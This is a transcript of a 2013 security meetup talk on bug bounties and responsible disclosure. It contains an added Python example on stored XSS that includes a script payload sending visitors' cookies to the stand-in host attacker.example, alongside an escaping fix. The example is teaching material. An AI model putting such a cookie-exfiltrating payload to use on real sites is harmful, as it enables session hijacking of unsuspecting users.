Disclosing Vulnerabilities for Fun and Profit
null Bangalore Chapter, January 2013 Meet
Disclosing Vulnerabilities
FOR FUN & PROFIT
Nikhil.P.Kulkarni
www.twitter.com/nikchillz
Nikhil Kulkarni
A 21-year-old tech enthusiast.
A blogger, web designer and graphic designer.
Mainly into Web App Testing
(aka Intrud3r)
facebook.com/nikchillz
twitter.com/nikchillz
File Inclusion BUG
VULNERABILITY
DISCLOSURE
FULL DISCLOSURE
RESPONSIBLE DISCLOSURE
Tools
Proxies:
Burp Suite
WebScarab
Fiddler
And many more…!!!
Firefox add-ons:
Tamper Data
Web Developer
Live HTTP Headers
Firebug
HackBar
XSS Me
And many more…!!!
Optional:
Camtasia Studio (screen recorder)
Snipping Tool (screenshots)
Useful tools:
IronWASP
Xenotix (OWASP Xenotix XSS Exploit Framework)
And many more…!!!
Bug bounty reward ranges:
$100 to $20,000
$500 to $5,000
$500 to $3,000
Unknown prize money (approx. $50 to $10,000)
$500 + T-shirt
Reference: http://computersecuritywithethicalhacking.blogspot.in/2012/09/web-product-vulnerabilty-bug-bounty.html
Normal resume vs. resume with HOF (Hall of Fame) credits
Find Bugs
Report Them
Get Reward
Party
Broke
Never go for full disclosure without the company's permission.
Always make sure you have attempted responsible disclosure before going for full disclosure.
KEEDA Project: a null community initiative
Highlights:
Informs vendors and CERTs about vulnerabilities found in the wild.
Credit is given to the bug submitter.
Does not charge the vendor in return, but expects at least a thank-you letter from the vendor.
If the vendor does not fix the bug, full disclosure of the bug is done through the Keeda portal.
Stored XSS in the Official Website of
DELL
DEMO
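The slide only names the demo (a stored XSS on a vendor site); the details of that bug are not in the transcript. As an added example that is not part of the talk, the snippet below shows the general shape of a stored XSS with a constructed in-memory comment store: the vulnerable renderer echoes stored input into HTML unescaped, the hardened renderer HTML-encodes every untrusted field at output time. The attacker host attacker.example and all comment data are constructed for the example.

```python
import html
from typing import List, Tuple

# Constructed in-memory "database" of (author, body) comments. It stands in for the
# persistent store that makes this a *stored* (rather than reflected) XSS: the
# payload is submitted once and served to every later visitor.
_COMMENTS: List[Tuple[str, str]] = []

# Constructed attacker input. If echoed back unescaped, it exfiltrates the
# visitor's cookies to a hypothetical attacker-controlled host.
XSS_PAYLOAD = (
    '<script>document.location="http://attacker.example/?c="'
    '+document.cookie</script>'
)


def store_comment(author: str, body: str) -> None:
    """Persist a comment exactly as submitted (no validation, as in the vulnerable app)."""
    _COMMENTS.append((author, body))


def render_vulnerable() -> str:
    """Vulnerable rendering: stored data is interpolated straight into the HTML."""
    rows = [f"<li><b>{author}</b>: {body}</li>" for author, body in _COMMENTS]
    return "<ul>" + "".join(rows) + "</ul>"


def render_safe() -> str:
    """Hardened rendering: every untrusted field is HTML-encoded at output time.

    quote=True also encodes " and ' so the same data is safe inside attribute values.
    """
    rows = [
        f"<li><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</li>"
        for author, body in _COMMENTS
    ]
    return "<ul>" + "".join(rows) + "</ul>"


def contains_live_script(page: str) -> bool:
    """Crude check for the demo: does the output contain an unescaped <script tag?

    After escaping, the tag appears as &lt;script, which a browser will not execute.
    """
    return "<script" in page.lower()


def demo() -> Tuple[bool, bool]:
    """Populate the store with one benign and one malicious comment and render both ways.

    Returns (script executes in vulnerable page, script executes in safe page).
    """
    _COMMENTS.clear()
    store_comment("alice", "Nice laptop!")
    store_comment("mallory", XSS_PAYLOAD)
    return contains_live_script(render_vulnerable()), contains_live_script(render_safe())


if __name__ == "__main__":
    vulnerable_hit, safe_hit = demo()
    print("vulnerable page executes payload:", vulnerable_hit)
    print("hardened page executes payload:  ", safe_hit)
```

Output encoding is the fix; stripping `<script>` on input is not, because the same stored string may later be placed in an attribute, a URL or a JavaScript block where a different encoding is needed.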
XSS, CSRF, SQLi and many more
Kislay Bhardwaj
Prashanth.K.V
Riyaz Walikar
Amol Naik
Prasanna Kangasabai
Akash Mahajan
Sabari Selvan
Srikanth Rao
Himanshu Kumar Das
Suriya Prakash
Harsimram Walia
Lava Kumar
And the whole of NULL Bangalore Chapter.
Thank You
NULL Bangalore
Nikhil.P.Kulkarni www.facebook.com/nikchillz www.twitter.com/nikchillz